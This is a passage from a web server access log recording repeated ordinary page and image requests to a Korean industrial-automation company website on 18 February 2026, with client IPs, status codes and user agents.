Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:56:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:15:35 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 68.183.27.37] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[18/Feb/2026:12:15:36 +0000] - - 301 - GET http www.hanmocnn.co.kr "/favicon.ico" [Client 68.183.27.37] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://www.hanmocnn.co.kr/" -[18/Feb/2026:12:15:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 68.183.27.37] [Length 10554] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[18/Feb/2026:12:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 68.183.27.37] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:12:46:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 